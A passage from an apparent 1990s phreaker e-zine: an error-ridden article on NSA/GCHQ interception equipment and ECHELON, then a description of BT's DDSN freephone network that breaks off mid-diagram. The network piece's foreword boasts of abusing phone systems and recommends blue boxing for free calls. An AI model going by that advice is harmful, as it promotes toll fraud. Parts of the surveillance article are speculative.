E-1, which carrys 30 phone channels at 2 Mbps. Most COMINT telecommunications interception equipment is designed to intercept the European transmission protocols. New digital telephony techniques are emerging all the time, so Comint agencies spend alot of time and money investigating each new transmission technique. One of the latest developments, is the implementation of the SONET network, which uses synchronised signals which are carried by high capacity optical fibres, and are supposidly easily extractable by Comint agencies when high capacity links are involved. b) Covert Telecommunications Interception Equipment The NSA contract many organisations to devlop and produce Comint and Sigint sophisticated interception equipment. Such entitys include Space Systems, Lockheed, TRW, Raytheon and Bendix. The two majour contracted NSA developers include AST (Applied Signal Technology) and IDEAS corp, where the directors are ex NSA employees. Out of all these NSA contracted developers, AST seems to be the most conspicuous, and describes its equipment as "TEMPEST screened" Such an organisation was described as "the one stop ECHELON shop". Extraction of Wideband Signals and Data Analysis ================================================ Where wideband/broadband siganl interception is concerned, they are usually intercepted from satelite relays and tapped digital multiplexed cables. One such method used by COMINT agencies is called "wideband extraction", and involves utilising specialsed Sigint equipment manufactured by the NSA contracted companies. Interception applications available to COMINT agencies is as followed: (transponder survey equipment) o satellite downlink inception o demodulators o decoders o demultiplexers o microwave radio link analysers o link survey units o carrier analysis systems Satelite data link interception is analysised with AST equipment (AST model 196 transponder charactorisation system) where the basic structure of the siganl is broken down and analyised. The AST model 195 "the SNAPPER" is a wideband snapshot analyiser and capture data from extensivly high capicity systems for extraction. A newly developed system is the AST model 990, "Flexible Data Acquisition Unit", which is designed to record and analyise data from 2.488 Gbps SONET OC-48 telecommunications backbones, this device is fitted with 48 Gigs of memory and is capable of intercepting every packet of data from multiple internet exchanges. The data that is intercepted is then stored on RAID HD networks and then later analyised by an AST SONET 257E analyiser. Their are many steps and procedures that Comint agencies follow when intercepting such data. First, obviously the data is intercepted at links, channels and exchanges, then the captured data is broken down into parts so that multi channel processors can extract then filter the contained messages such as voice channels, fax communication, and modem data. " The AST Model 120 multi-channel processor - used by NSA in different configurations known as STARQUAKE, COBRA and COPPERHEAD - can handle 1,000 simultaneous voice channels and automatically extract fax, data and voice traffic. Model 128, larger still, can process 16 European E-3 channels (a data rate of 500 Mbps) and extract 480 channels of interest. The 1999 giant of AST's range, the Model 132 "Voice Channel Demultiplexer", can scan up to 56,700 communications channels, extracting more than 3,000 voice channels of interest. AST also provides Sigint equipment to intercept low capacity VSAT satellite services used by smaller businesses and domestic users. These systems can be intercepted by the AST Model 285 SCPS processor, which identifies and extracts up to 48 channels of interest, distinguished between voice, fax and data. " Covert Data Processing, Fax Transmission Analysis ================================================= After the actual transmission interception has taken place, the extracted data is then analyised by sophistaicated AST developed software with "user friendly" equipment. AST have developed specialised covert operations data filtering and extraction software called ELVIRA which opertates on given specifications such as STRUM. THe software analysises the data and informs the user of phone call destinations and other signal related information. The information is then sent back to a remote NSA location in the form of CSDF (Collected Signals Data Format). Included in this file is a screenshot of a special software platform designed by AST called TRAILMAPPER which can operate upto speeds of 2.5 Gbps, and is designed to be very versatile, in the sense that it can intercept any type of telecommunications medium (especialy optitical protocols). The trailmapper software is especialy suited to extracting and analysising data from the new ATM (Asychronous Transfer Mode) networks which are becoming increasing popular from implementation from IXCs such as AT&T. AT&T operate a special ATM network which spans the US, aswell as another ATM network which is backboned via European locations. COMINT agencies are esspecialy interested in ATM networks because telco providers offer ATM networking for VPNs, LANS and international WANS. AST also offer very specialised equipment and software which is designed to intercept data from devices used to connect to networks and the internet. When a telecommunications link is intercepted, a transmission from an individual using a modem to connect to a network or the internet is easily extracted and then later anlayised. Aswell as modem interception, FAX transmissions are also of intellegence interest. A fax transmission can be intercepted at any point juring its journy over a PSTN, and then later analysied (or analyised in real time) by AST software such as the Fax Image Workstation which implements OCR (Optical Charcter Recognition). And if you think that's scary.. AST also produce a system called "Pager Identification and Message Extraction" system which automatically collects and processes data from commercial paging systems. The NSA contracted collective "IDEAS" also produce specialised covert equipment like the VTP (Video Teleconferencing Processor) which has the ability to intercept and record multiple similtanious video, and/or teleconference calls. Multi Protocol Traffic Analysis Techniqes ========================================= Covert agencies participate in the art of traffic analysis, where information from telephone calls is processed and then later studied, depending on the area of "interest". For example, in such activities, information about the subjects line is always tranmitted when placing a call, such as the CLID and the origin of the call via SS7 protocols. Even if voice encryption is used, the intercepted voice channel still reveals important, and potentialy sensitive data about the call type: o CLID o duration of call o OPC codes o destination of call o freqency of call setups Text locators: Applications have been built that are designed to intercept and sift through large arrays and quantitys of data and information. Such applications are essential to the effective operation of systems such as ECHELON, as the ECHELON system uses dictionary based applications to filter important or un-inportant data. Such systems can be ported to act as robots on most communication protocols, such as IP or voice traffic. Data that has been intercepted is stored on massive databases for later retreavel, so a covert agency could implement topic analysis technology to search an internal database for keywords, ie: "counter attack" or "kill the president". The NSA currently use a filtering method known as "N-gram" which is designed to sort through a textual database for any topic, regardless of language. "To use N-gram analysis, the operator ignores keywords and defines the enquiry by providing the system with selected written documents concerning the topic of interest. The system determines what the topic is from the seed group of documents, and then calculates the probability that other documents cover the same topic. In 1994, NSA made its N-gram system available for commercial exploitation. NSA's research group claimed that it could be used on "very large data sets (millions of documents)", could be quickly implemented on any computer system and that it could operate effectively "in text containing a great many errors (typically 10-15% of all characters)". The "Data Workstation" Comint software system analyses up to 10,000 recorded messages, identifying Internet traffic, e-mail messages and attachments Speech Recognition and Voice Interception ========================================= The UK's GCHQ combined with the US's NSA all conduct research into speech recognition techniques. Rumours that such technology is used to "pick up" on certain keywords in telephone speech cannot be classified as concrete fact, because obviously such organisations would deny this type of communications monitoring. However, if such a system is deployed by these agencies, they would be able to gather a higher degree of intellegence information, rather than picking on areas of suspition. If software is available to the public that allows a pc user to talk to a computer, then have the computer dictate what the person is saying into text format, just imagine what the COMINT agencies have.. Advanced Speech Recognition, Real CallerID ========================================== GCHQ and the NSA currently have TE464375-1 VADA (Voice Activity Detector and Analyser) equipment installed inside a GCHQ base in Cheltenham England. Advanced specch recognition systems can be produced to operate on a mass scale basis, whereas a subjects voice patterns can be programmed into such a device, which will then hunt that particular voice patter down on a given set of telephone channels. System descriptions must be classified "secret" if NSA "determines that they represent major advances over techniques known in the research community". 8. Closing, Summerisation This article only covers a very limited set of covert communications interception techniques, their are many more out their. The COMINT and SIGINT organisations are very resourcfull, in the sense that they have vast funds to back up research into covert communications devices. The idea that technology exists that can distinguish voice patterns over telephone channels it particulary scary, and in a sense, a complete infringment of the "private" service that the telco providers offer. The fact is, such technologys do exist, and can (or have) been implemented. Telecommunications equipment is intended for the interception of "hotspot" information such as military and diplomatic communications, it is however strange that such systems are designed to be attached to majour telecommunications backbones (Opticaly Derived) to "filter" the imporatant information. Its a case of whether or not you "trust" the NSA or GCHQ or whatever to only intercept real intellegence information, or whether they'll adopt the "big brother" approach and monitor ALL communications. Either way, they are unlikely to admit to any such activitys, the fact is, they have the technology and the ability to monitor all majour communications protocols.. Do you trust them? Do they trust you? Its all in the name of "National Security"... Well, thats it for this file, I hope you enjoyed it. Werd/Shouts to: D4RKCYDE, 9x, b4b0, kelticphr0st, jasun, zomba, bodie, gr1p, shadowx, lowtek, psyclone, shylock, digiphreq, downtime, elaich, oxidation, substance, tip, pbxphreak, lusta & nou, force, microwire, oclet, knight, siezer, devious. ------------------------------------------------------------------------------ B L 4 C K M 1 L K teleph0nics FUCKIN HARDCORE, BABY http://hybrid.dtmf.org/ ------------------------------------------------------------------------------ Type Bits/KeyID Date User ID pub 2048/86298E99 1999/09/18 hybrid -----BEGIN PGP PUBLIC KEY BLOCK----- Version: 2.6.3ia mQENAzfjBzcAAAEIANaRNlbj/1FQo3V6JK4L+lziSwsXh/axd7trkB9lP2Sxwv/U F7/avmxY3PhjjpqG3o85z2D1qduVSZcXoN6iF/JiCMqAU2nsfmZwvO9U7WZX5Xv/ wEUuqDAt59YKLqSjpZXue/ROZJLSAJXbhbOEZdq24gzDMAvCmqJJWk/7QdFoJYl1 0aszUPTyw6JA0ys+K9YRyiYAPe4RvJV0VaImP5uNaf8w+H1znTL8dUmUYqSbbRx2 0p5AJTxPTYsNWRg9LopF2qVIOf8SGpvJTCfsLoZxfmezUBWv5nrSU6H9xlFGdlJK RezXi8QYGEyljAZODt930r9iS9XxckKelIYpjpkABRG0GGh5YnJpZCA8aHlicmlk QGR0bWYub3JnPokBFQMFEDfjBzhyQp6UhimOmQEBC70H/R+rZfFef3PzGO0ez9ct dNq7lTUkuStXmqpJhHNSuNEAx9b5q2DjKS/LJQYn+WymfA0mSeGaYL8yJ7wroh1N JHySe266qEjov6R/WjUk1f/OEz38UCfzln7MtLykhk9bnWC745uwTiXAdU6hUzUN J45opUpWwAQ843MWypN3Mm4q7UnBMAlcUXyyWEWpZrc9lxSaZDyw9acEZLKqDgwB m6fMiyq4QXeoVI4HbLHiZFDll7+XE5HripXyKXU0qhACcr7JbM5jYWrmob9XL94r 3HAiOfJQbQIC25D3Cbf++ilwLsTdVR6bCFsiw3YPEK9/v0WTZHAIr8ftXl2C2OjG Q0s= =8jkO -----END PGP PUBLIC KEY BLOCK----- . : | +-+[ DDSN intellegent network ]+---> by kelticphrost <-----------------------+ +-+[ D4RKCYDE ]+---> <-----------------------+ | : . _\|/_ [ GBH ] Ghwan Burnin Haxorz [ GBH ] _\|/_ /////////////////////////////////////////////////////////////////////////// // // // DDSN Intelligent Network // // // // A full rundown of our LinkLine (0800) and LoCall (0345) Services // // // // Presented in full By Keltic Phr0st // // // /////////////////////////////////////////////////////////////////////////// "...the most sophisticated network of its type ouside North America." Steve Webster, BT ; DDSN Development Team FOREWORD ======== This article shook me up very badly after reading it. At the time I'd been working extensively on a Unix Box in 896, and abusing the fuck out of P****** for global calls in 892. Not only this, but a host of other activities, which are probably nestling on some AMA tape somewhere, waiting to be looked at... . Its not all doom and gloom though - AMA has yet to pinpoint Blue Boxing for some reason, and in so far this would seem to be the only real 'safe' method of putting your calls away for free alongside cellular, I reccomend you start to view it in a new light. Anyway, after that suitably apocalyptic snippet, here we go. ///// ///// ///// ///// ///// ///// ///// ///// ///// ///// INTRODUCTION ============ In 1983, British Telecom identified a major market potential for automatic freephone and premium rate services. An Analogue Network, with extended register translation and call charging facilities overlayed on the PSTN was proposed as an interim solution. The analogue derived services network, consisting of eight fully-interconnected switching nodes, was brought into limited public service in April 1985 and full public service in July 1985. The LinkLine 0800 service permits calling customers to make calls free of charge while callers to LinkLine 0345 service numbers are charged at the local call rate irrespective of distance. The balance of the call charge is billed to the called customer known as the Service Provider (SP). In keeping with its buisness modernisation programmes, British Telecom awarded a contract to AT&T for the supply and installation of a digital derived services network (DDSN), comprising 5ESS-PRX digital switches to be implemented in two distinct phases: Phase 1, which was completed in 1988, involved the supply of eight digital units, utilising CCITT No. 7 common-channel signalling, as replacements for their analogue units (Figure 1). In addition, two new digital units were provided in London. Figure 1 : Digital Derived Services Network Interconnection ÚÄÄÄÄÄ¿ ÚÄÄÄÄÄ¿ ³ DLE ³ ³ DLE ³ ÀÄÄÂÄÄÙ ÀÄÄÂÄÄÙ ³ ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ» ³ ÚÄÄÁÄÄÄ¿ º SP DIGITAL DERIVED SP º ÚÄÄÄÁÄÄ¿ ³ DMSU ³ º  SERVICES NETWORK  º ³ DMSU ³ ÀÄÄÂÄÄÄÙ º ³ ³ º ÀÄÄÄÂÄÄÙ ³ º ³ ³ º ³ ³ º ³ ³ º ³ ³ º ÚÄÄÄÁÄÄÄ¿ ÚÄÄÄÁÄÄÄ¿ º ³ ÀÄÄÄÄÄÄÄÄ´ DDSSC ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ´ DDSSC ÃÄÄÄÄÄÄÄÄÙ º ÀÄÄÄÂÄÄÂÙ ÀÂÄÄÂÄÄÄÙ º º ³ ³ ÚÄÄÄÙ ³ º º ³ ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄijÄÄÄ¿ ³ º º ³ ³ ³ ³ º º ³ ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ ³ ³ º º ÚÄÄÄÁÄÄÁ¿ ÚÁÄÄÁÄÄÄ¿ º ÚÄÄÄÄÄÄÄÄ´ DDSSC ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ´ DDSSC ÃÄÄÄÄÄÄÄÄ¿ ³ º ÀÄÄÄÂÄÄÄÙ ÀÄÄÄÂÄÄÄÙ º ³ ³ º ³ (Only 4 centres ³ º ³ ³ º ³ shown for clarity) ³ º ³ ÚÄÄÁÄÄÄ¿ º ³ ³ º ÚÄÄÄÁÄÄ¿ ³ AMSU ³ º Á Á º ³ AMSU ³ ÀÄÄÂÄÄÄÙ º SP SP º ÀÄÄÄÂÄÄÙ ³ º º ³ ³ ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ ³ ÚÄÄÁÄÄ¿ ÚÄÄÁÄÄ¿ ³ ALE ³ ³ ALE ³ ÀÄÄÄÄÄÙ EXISTING PUBLIC SWICHED ÀÄÄÄÄÄÙ TELEPHONE NETWORK AMSU Analogue Main Switching Unit ALE Analogue Local Exchange DDSSC Digital Derived Services Switching Centre DLE Digital Local Exchange DMSU Digital Main Switching Unit SP Service Provider Phase 2 makes provision for an advanced freephone service using an intelligent network architecture. INTELLIGENT NETWORK CONCEPT =========================== In a traditional telecommunications network, call control 'intelligence' resides in the call processing software in its switching nodes. One disadvan- tage of this approach for some services is that customer-specific data has to be replicated in each node. As features become more sophisticated, then system complexity increases. In the DDSN Intelligent Network, specialised customer feature and routing information is held centrally in a network database which can be accessed by all switching nodes using dedicated datalinks and common-channel signalling (Figure 2). These signalling datalinks are used to pass requests for call handling information to the database and return instructions to the originating switching node. Figure 2 : Network DataBase Concept ÚÄÄÄÄÄÄÄÄÄÄ¿ ³ NETWORK ³ /³ DATABASE ³\ / ÀÄÄÄÄÄÄÄÄÄÄÙ \ ACCESS TO/FROM ALL DDSN SWITCHES / | \ / | \ ÚÄÄÄÄÄÄÄÄ¿ | \ ÚÄÄÄÄÄÄÄÄ¿ ³ DDSN ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ´ DDSN ³ ³ SWITCH ³ ³ SWITCH ³ ÀÄÄÄÂÄÄÂÄÙ ÀÂÄÄÂÄÄÄÄÙ ³ ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ ³ ³ Ú³Ù ³ ³ ³³ ³ ³ ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ ³ ÚÄÄÄÁÄÄÁÄ¿ ÚÄ¿ ÚÁÄÄÁÄÄÄÄ¿ ³ DDSN ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄijÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ´ DDSN ³ ³ SWITCH ³ ³ ³ ³ SWITCH ³ ÀÄÄÄÄÄÄÄÄÙ ÀÂÙ ÀÄÄÄÄÄÄÄÄÙ ³ ³ SPEECH AND SIGNALLING An Intelligent network centralised call management fucntion allows an economical implementation of advanced features, simplifies administration of complex services and assures optimum use of network-wide, rather than switch-based, resources. DDSN INTELLIGENT NETWORK ARCHITECTURE ===================================== Three network elements are concerned with call processing for service providers with advanced features: o Action Control Point (ACP) o Network Control Point (NCP) o Network Services Complex (NSC) The network architecture is illustrated in Figure 3, and the role of each of the elements will become apparent as the call processing aspects are explained. Figure 3 : DDSN Intelligent Network Architecture ÚÄÄÄÄÄ¿ ÚÄÄÄÄÄ¿ ÚÄÄÄÄÄ¿ ³ NSC ³ ³ NSC ³ ³ NSC ³ ÀÄÂÄÂÄÙ ÀÄÄÂÄÄÙ ÀÄÄÂÄÄÙ C T ³ ³ 7 T ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ ÚÄÄÄÄÄÄÄÄÄÄÄÄ´ N T ³ C7NA ³ ³ C7NA ³ A ³ ³ÚÄÄÄÄÄÄÄÄÄÄÄÄijÄÄÙ ³ ³ ³ ³³ ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿³ ÚÁÄÁÄÄÄÄÄÄÄÄÄÁÁÄ¿ ÚÄÁÁÄÄÄÄÄÄÄÄÄÄÄÄ¿ ÄÄTÄÄTÄÄTÄ´ ÃÄÄÄÄÄÄÄÄÄC7NAÄÄÄÄÄÄÄÄÄÄÄ´ ÃÄTÄÄÄTÄÄÄTÄÄ ³ ACP/STEP/HOST ÃÄÄÄTÄÄÄÄÄÄÄTÄÄÄÄÄÄÄÄTÄÄÄ´ ACP / STEP ³ ÄÄÄC7BTÄÄÄ´ ÃÄÄÄÄÄÄÄÄÄC7BTÄÄÄÄÄÄÄÄÄÄÄ´ ÃÄÄÄC7BTÄÄÄÄÄ (PSTN) ÀÂÄÂÄÂÄÄÄÄÄÄÄÂÂÂÙ ÀÂÂÂÄÄÄÄÄÄÄÂÄÂÄÂÙ (PSTN) C V C ³³ÀÄÄÄÄÄÄÄÄÄÄC7BTÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ C V C ³ O ³ ³ÀÄÄÄÄÄÄÄVOICE TRUNKSÄÄÄÄÄÄÄÄÄ¿³ ³ O ³ 7 I 7 ÀÄÄÄÄÄÄÄÄÄÄÄÄC7NAÄÄÄÄÄÄÄÄÄÄÄÄ¿³³ 7 I 7 ³ C ³ ÚÄÄÄÄÄÄÄÄÄÄÄÄC7BTÄÄÄÄÄÄÄÄÄÄÄij³³ ³ C ³ N E B ³ÚÄÄÄÄÄÄÄVOICE TRUNKSÄÄÄÄÄÄÄij³³ N E B ³ ³ ³ ³³ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄij³³ ³ ³ ³ A T T ³³³ ³³³ A T T ³ R ³ ³³³ ³³³ ³ R ³ ³ U ³ ³³³ ³³³ ³ U ³ ³ N ³ ³³³ ³³³ ³ N ³ ³ K ³ ³³³ ³³³ ³ K ³ ³ S ³ ³³³ ³³³ ³ S ³ ÚÁÄÁÄÁÄÄÄÄÄÄÄÁÁÁ¿ ÚÁÁÁÄÄÄÄÄÄÄÁÄÁÄÁ¿ ÄÄTÄÄTÄÄTÄ´ ÃÄÄÄTÄÄÄÄÄÄÄTÄÄÄÄÄÄÄÄTÄÄÄ´ ÃÄTÄÄÄTÄÄÄTÄÄ ³ ACP ³ ³ ACP / HOST ³ ÄÄÄC7BTÄÄÄ´ ÃÄÄÄÄÄÄÄÄÄC7BTÄÄÄÄÄÄÄÄÄÄÄ´ ÃÄÄÄC7BTÄÄÄÄÄ (PSTN) ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ ÀÄÄÄÄÄÄÄÄÄÄÄÄÂÄÂÙ (PSTN) C T 7 T N T ÄTÄTÄTÄ = VOICE TRUNKS A ³ ³ ³ ÚÄÁÄÁÄ¿ ACP ACTION CONTROL POINT ³ NSC ³ STEP SIGNAL TRANSFER AND END POINT ÀÄÄÄÄÄÙ C7BT CCITT #7 SIGNALLING (BT) NCP NETWORK CONTROL POINT NSC NETWORK SERVICES COMPLEX C7NA C7 NORTH AMERICAN (Only four switching nodes are shown for simplicity) Action Control Point -------------------- The Action Control Points (ACPs) are the 5ESS-PRX Switching Nodes, which serve as transit and terminating nodes for DDSN traffic. All ACPs are fully interconnected by digital line systems and CCITT #7 (BT) common channel signalling. The CCITT #7 (BT) signalling links are used exclusively for setting up speech paths both within the DDSN and between the DDSN and the PSTN. A Second totally independent common channel signalling network, utilising a proprietary form of #7 signalling (C7 North American), is used for transporting non-circuit related signalling methods between the ACPs and the Network Control Points (NCPs). This network is used only for advanced feature calls. Two of the ACPs have been nominated as a signal transfer and end point (STEP) and funnel the signalling traffic from the remaining ACPs to the NCPs. ACPs load share the C7NA signalling messages across both STEPs in the ACP-to-NCP direction, and the NCPs load share the signalling messages across both STEPs in the reverse direction. Network Control Point --------------------- The Network Control Point (NCP) constitutes the core of the intelligent network and holds the data defining the treatment for specific advanced feature calls. NCPs are always provided in mated pairs. Each NCP consists of a duplex processor, duplicated hard discs for data storage, tape drives and interfaces to the other network elements through a Local Area Network. This network, called the Common Network Interface, consists of the signalling terminals for the C7NA links from the STEP nodes and two peripheral controllers which communicate with the duplex processor. The common network interface ring (Figure 4) is automatically reconfigured under fault conditions to isolate the faulty section. Figure 4 : Common Network Interface Ring ÚÄÄÄÄÄÄÄÄÄÄ¿ ÚÄÄÄÄÄÄÄÄÄÄ¿ ³ ACP/STEP ³ ³ ACP/STEP ³ ÀÄÄÂÄÄÄÄÂÄÄÙ ÚÄÄÄÄÄÄ¿ ÀÄÄÂÄÄÄÄÂÄÄÙ ÚÄijÄÄÄijĿ ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ´ ÃÄÄÄÄÄÄÄÄÄÄ<ÄÄÄÄÄÄ¿ ³ ³ ÃÄÄÄÄÄÄÄÄÄÙ ³ ³ RPCN ³ ³ ³ ³ ³ ³ 7 ³ ÚÄÄÄÄÄÄÄÄÄÄÄÄÄ´ ÃÄÄÄÄÄÄÄÄÄ>ÄÄÄÄ¿ ³ ³ ³ ³ ³ N ³ ³ ÀÄÄÄÂÄÄÙ ³ ³ ³ ³ ³ ³ A ÚÁÄÄÁ¿ ³ ³ ³ ³ ³ ³ C ÀÄÄÄÄÄ´ LN ³ ³ ³ ³ ³ ³ ³ 7 ÀÂÄÄÂÙ ³ ³ ³ C ³ ³ N ³ ³ ³ ³ ³ 7 ³ ³ A ³ ³ ÚÄÄÄÄÄÁÄÄÄÄÄ¿ ³ ³ N ³ ³ ³ ÚÁÄÄÁ¿ ³ CENTRAL ³ ÚÁÄÄÁ¿ A C ³ ÀÄÄÄÄÄÄÄÄÄÄ´ LN ³ ³ PROCESSOR ³ ³ LN ÃÄÄÄÄÄÙ 7 ³ ÀÂÄÄÂÙ ÀÄÄÄÄÄÂÄÄÄÄÄÙ ÀÂÄÄÂÙ N ³ ³ ³ ³ ³ ³ A ³ ³ ³ ³ ³ ³ ³ ³ ³ ³ ³ ÚÁÄÄÁ¿ ³ ³ SIGNALLING ³ ³ ³ ³ LN ÃÄÄÄÄÄÄÄÄÄÄÙ ÀÄ LINKS ³ ³ RING 1 ÚÄÄÄÁÄÄ¿ ÀÂÄÄÂÙ ³ ÀÄÄÄÄ<ÄÄÄÄÄÄÄÄ´ ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ ³ ³ ³ RPCN ³ ³ ÀÄÄÄÄÄÄÄÄ>ÄÄÄÄÄÄÄ´ ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ RING 0 ÀÄÄÄÄÄÄÙ LN LINK NODE RPCN RING PERIPHERAL CONTROLLER NODE Advanced freephone call handling data is duplicated both within and and between each NCP in the mated pair. Call routing queries from the ACPs are balanced between the two NCPs by designating specific dialled codes to each NCP, and the decision on which NCP to query is taken at the ACP where the call entered the DDSN network. Although data is held on both NCPs, the secondary NCP is only accessed if the primary is not available. Under these conditions, the remaining NCP is capable of handling 100% of the load. This architecture virtually guarantees 100% service availability. Automatic network management controls initiated by the NCP maintain the integrity of the intelligent network under overload conditions by sending code gapping messages instructing the ACPs to throttle back on the number of queries being forwarded to the NCP and defining the treatment for failed calls. Network Services Complex ------------------------ The Network services complex (NSC) provides the capability to give callers standard or customised interactive spoken information pertaining to the number called, such as, call prompting, courtesy response and call queing announcements. During or after a call prompting announcement the caller may communicate with the NSC by keying-in appropriate digits on an MF keyphone or keypad. The NSC can collect up to 15 digits which it forwards, via its host ACP, to the NCP via a C7NA common channel signalling link. Initially, two NSCs loaded with the same announcements have been provided in the DDSN intelligent network and are co-located with the NCPs. Each NSC can handle 60 simultaneous calls and provide up to 2000 different announcements which are stored on triplicated moving head discs. In the even of an NSC failure, calls requiring these features are routed to the remaining NSC. The NSC architecture is given in Figure 5. Figure 5 : Network Services Complex Architecture ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ ³ ACP / HOST ³ ÀÄÄÄÂÄÄÄÄÄÄÄÂÄÄÄÙ T C ³ 7 T N ³ A T ³ ÚÄÄÄÄÄÄÄÄÄÄÄÄ¿ ÚÄÄÄÁÄÄÄÄÄÄÄÁÄÄÄ¿ ³ SIGNALLING ³ ³ TIME-SLOT ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ´ LINK ³ ³ INTERCHANGE ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ ³ TERMINAL ³ ÀÄÄÄÂÄÄÄÄÄÄÄÂÄÄÄÙ ³ ÀÄÄÄÄÄÄÂÄÄÄÄÄÙ ³ ³ ³ ³ ³ ³ ³ ³ ³ ³ ³ ³ ³ ³ ³ ³ ³ ³ ³ ³ ³ ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ ³ ³ ³ ³ ³ ÚÄÄÄÄÄÄÁÄÄÄÄÄÄ¿ ³ ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÂÄÄÄÁÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ´ PROCESSOR ³ ³ ³ ³ ³ ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÙ ÚÄÁÄÄÄÄÄÄÁÄÄ¿ ³ ³ ³ DATA ³ ³ ³ ³ STORAGE ³ ³ ³ ³ UNITS ³ ³ ³ ÀÄÄÄÄÄÂÄÄÄÄÄÙ ÚÄÄÁÄÄÄÄÄÁÄ¿ ÚÄÄÄÁÄÄÄ¿ ³ TONE ³ ³ DISCS ³ ³ RECEIVER ³ ÀÄÄÄÄÄÄÄÙ ³ UNITS ³ ÀÄÄÄÄÄÄÄÄÄÄÙ ADVANCED FEATURES ================= The DDSN Intelligent Network will permit a range of new features to be offered as Advanced LinkLine to LinkLine service providers. These include (Advanced LinkLine feature name is in brackets) : o Time and Day Routing - The routing of calls can be made dependant on the time of day, day of week and week of the year. (TimeLink / DayLink) o Call Allocator - This provides the capability to route incoming calls proportionally to a number of service provider destinations and / or announcements. (DistributionLink) o Call Queuing - This provides queues for calls at the originating ACP when all available lines to a service provider destination are engaged. An announcement informs the caller of the call status. (QueueLink) o Call Barring - This feature allows service providers to define the treatment of a particular Advanced LinkLine number based on where the call origniated in the PSTN. (AreaLink) o Alternative Destination on Busy - When a busy condition is encountered and no queuing is define, an alternative destination may be chosen automatically. (BusyLink) o Call Prompter - Announcements will prompt callers to enter digits on their telephone set in order to realise caller interactive routing. (SelectLink) o Courtesy Response - If no destination can be reached, for example, due to an unattended office, a pre-defined standard or customised announcement may be played. (CourtesyLink) o Command Routing - This feature allows the service provider to instruct British Telecom to redirect calls to a preset alternate set of destinations. This is intended for emergency and other contingency situations. (CommandLink) CALL ROUTING PLANS ================== The true power of intelligent network call processing is not solely its list of advanced features, but combinations of the feature set which can be defined to meet a service provider's own unique telecommunications needs and, consequently, buisness requirements. An example of a simple call routing plan is shown in Figure 6. The data defining the call treatment(s) for a service provider are held in the NCP database in a service provider record. Figure 6 : Combining service features DIAL PULSE ÜÜÜÜÜÜÜÜ NO RESPONSE ß ÜÜÜÜ ß ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÛ°°Û ³ OPERATOR SELECTLINK ³ ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ» ³ º "KEY 1 FOR COMMERCIAL LOANS, º ³ ÜÜÜÜÜÜÜÜ º KEY 2 FOR CONSUMER LOANS..." º ³ DIGIT #1 ß ÜÜÜÜ ß ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÑÍÍͼ ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÛ°°Û ³ COMMERCIAL À Ä ³ LOANS ³ ³ DAYLINK AREALINK ÚÁÄÄÁÄÄÄÄ¿ ÜÜÜÜÜÜÜÜ ÚÄÄÄÄÄÄ¿ MON - FRI ÚÄÄÄÄÄÄÄ¿ LONDON ³ WHAT ³ DIGIT #2 ß ÜÜÜÜ ß ÄÄÄ>ÄÄÄ´ WHAT ÃÄÄÄÄÄÄÄÄÄÄÄ´ WHAT ÃÄÄÄÄÄÄÄÄ´ MF ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÛ°°Û ³ DAY? ³ ³ AREA? ³ ³ DIGIT? ³ CONSUMER ÀÄÄÂÄÄÄÙ ÀÄÄÂÄÄÄÄÙ ÀÄÄÄÂÄÄÄÄÙ LOANS ³ ³ ³ ³ ³ ³ ³ ³ ³ ÜÜÜÜÜÜÜÜ ³ ³ ³ DIGIT #3 ß ÜÜÜÜ ß ³ ³ ALL ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÛ°°Û ³ ³ OTHER OTHER ³ ³ ³ ³ ³ ³ ³ ³ ÜÜÜÜÜÜÜÜ ³ ³ ß ÜÜÜÜ ß ³ 